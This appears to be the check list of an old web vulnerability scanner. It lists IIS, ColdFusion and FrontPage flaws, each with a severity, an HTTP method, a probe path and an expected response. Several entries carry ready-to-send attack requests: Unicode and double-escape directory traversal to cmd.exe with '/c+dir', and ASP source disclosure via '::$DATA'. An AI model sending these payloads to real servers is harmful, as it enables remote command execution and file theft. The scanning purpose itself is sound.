home *** CD-ROM | disk | FTP | other *** search
- RDS exploit (msadcs.dll) RFP9902
- 0,Run arbitrary commands (SYSTEM level privileges)
- HEAD
- msadcs.dll
- msadc
-
- 529
- #-----------------------------------------------------------
- Escaped Characters Decoding Bug
- 0,Run arbitrary commands (IUSR_machinename level privileges)
- GET
- ..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
- scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
- DIRECTORY OF
- 2708
- #-----------------------------------------------------------
- Unicode Directory Transversal Bug
- 0,Run arbitrary commands (IUSR_machinename level privileges)
- GET
- ..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
- scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
- DIRECTORY OF
- 1806
- #-----------------------------------------------------------
- Unicode Directory Transversal Bug (2)
- 0,Run arbitrary commands (IUSR_machinename level privileges)
- GET
- ..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
- scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
- DIRECTORY OF
- 1806
- #-----------------------------------------------------------
- Executable File Parsing Bug
- 0,Run arbitrary commands (IUSR_machinename level privileges)
- GET
- lanscan.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C/winnt/system32/cmd.exe?/c+dir
- scripts,msadc,cgi-bin,bin,samples,_vti_cnf,_vti_bin,iisadmpwd
- DIRECTORY OF
- 1912
- #-----------------------------------------------------------
- .ida/.idq trick
- 2,posibility to guess physical paths
- HEAD
- lanscan.ida
- /
-
-
- #-----------------------------------------------------------
- .ida/.idq trick (2)
- 2,posibility to guess physical paths
- HEAD
- lanscan.idq
- /
-
-
- #-----------------------------------------------------------
- Cold Fusion check (1)
- 1,view any file (e.g. getfile.cfm?filename=c:\boot.ini)
- HEAD
- exampleapp/email/getfile.cfm
- cfdocs
-
-
- #-----------------------------------------------------------
- Cold Fusion check (2)
- 1,start/stop the server
- HEAD
- Administrator/startstop.html
- cfide
-
-
- #-----------------------------------------------------------
- Cold Fusion check (3)
- 1,run CF code or denial os service
- HEAD
- snippets/evaluate.cfm
- cfdocs
-
-
- #-----------------------------------------------------------
- Cold Fusion check (4)
- 2,verify the existance of files
- HEAD
- snippets/fileexists.cfm
- cfdocs
-
-
- #-----------------------------------------------------------
- Cold Fusion check (5)
- 1,view .cfm files
- HEAD
- snippets/viewexample.cfm
- cfdocs
-
-
- #-----------------------------------------------------------
- Cold Fusion check (6)
- 1,view any file
- HEAD
- exampleapp/docs/sourcewindow.cfm
- cfdocs
-
-
- #-----------------------------------------------------------
- Frontpage check (1)
- 3,Frontpage extensions are installed on this computer
- HEAD
- _vti_inf.html
- /
-
-
- #-----------------------------------------------------------
- Frontpage check (2)
- 1,Some versions of Frontpage are vulnerable to denial of service attacks
- HEAD
- shtml.exe
- _vti_bin
-
- 1608
- #-----------------------------------------------------------
- Frontpage check (3)
- 1,Some versions of Frontpage are vulnerable to denial of service attacks
- HEAD
- shtml.dll
- _vti_bin
-
- 1608
- #-----------------------------------------------------------
- Terminal Services
- 3,Terminal Services are installed on this computer
- HEAD
- tsweb
- /
-
-
- #-----------------------------------------------------------
- MS Visual Studio RAD Support Buffer Overflow
- 0,Run arbitrary commands (IUSR_SYSTEM level privileges)
- HEAD
- fp30reg.dll
- /_vti_bin/_vti_aut
-
- 2906
- #-----------------------------------------------------------
- ASP source using ::$DATA trick
- 2,Retrive the source code of the remote ASP scripts
- GET
- default.asp::$DATA
- /
- CONTENT-TYPE: APPLICATION/OCTET-STREAM
- CVE-1999-0278
- #-----------------------------------------------------------
- ASP source using %2e trick
- 2,Retrieve the source code of remote ASP scripts
- GET
- default.asp%2e
- /
- CONTENT-TYPE: APPLICATION/OCTET-STREAM
- CAN-1999-0253
- #-----------------------------------------------------------
-